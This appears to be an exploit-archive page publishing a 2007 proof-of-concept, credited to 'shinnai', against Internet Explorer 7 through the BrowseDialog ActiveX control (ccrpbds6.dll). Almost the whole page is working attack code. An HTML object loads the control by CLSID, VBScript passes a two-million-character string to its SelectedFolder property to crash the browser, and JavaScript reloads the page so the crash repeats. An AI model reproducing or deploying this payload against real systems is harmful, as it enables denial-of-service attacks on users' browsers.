[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
# Published : 2007-01-18
# Author : shinnai
# Previous Title : Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC
# Next Title : Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit


<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'>

argCount = 1

arg1=String(2000000, "A")

CCRP_BDc.SelectedFolder = arg1
</script>

<script language='javascript'>
document.location.reload()
</script>

# www.Syue.com [2007-01-18]